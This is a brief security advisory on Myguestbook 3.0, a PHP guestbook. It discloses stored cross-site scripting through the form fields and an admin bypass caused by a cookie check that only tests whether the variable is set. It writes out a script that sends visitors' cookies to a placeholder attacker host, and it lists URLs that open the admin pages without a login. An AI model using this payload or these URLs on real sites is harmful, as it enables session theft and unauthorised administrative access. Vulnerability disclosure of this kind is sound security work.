|
COMMAND Myguestbook (PHP) XSS and admin page access SYSTEMS AFFECTED Myguestbook version : 3.0 PROBLEM Frog Man [leseulfrog@hotmail.com] found : http://www.frog-man.org/tutos/Myguestbook.txt PHP Code/Location : °°°°°°°°°°°°°°°°°°° If pseudo = [SCRIPT], e-mail = >[SCRIPT] or message = </textarea>[SCRIPT] [SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php . /admin/confirm_connect.php : --------------------------------------------- SetCookie("Myguestbook","$name:$password"); --------------------------------------------- /admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php : -------------------------------------------------------------------- <? if(!isset($Myguestbook)) header("location:../index.php?MSG=permis"); ?> -------------------------------------------------------------------- Exploits : °°°°°°°°°° [SCRIPT] : <script> location='http://[attacker]/file.php?'+document.cookie; </script> http://[target]/admin/admin_index.php?Myguestbook=1 http://[target]/admin/admin_pass.php?Myguestbook=1 http://[target]/admin/admin_modif.php?Myguestbook=1 http://[target]/admin/admin_suppr.php?Myguestbook=1 http://[target]/admin/user_modif.php?id=[MESSAGEID] SOLUTION A patch can be found on http://www.phpsecure.org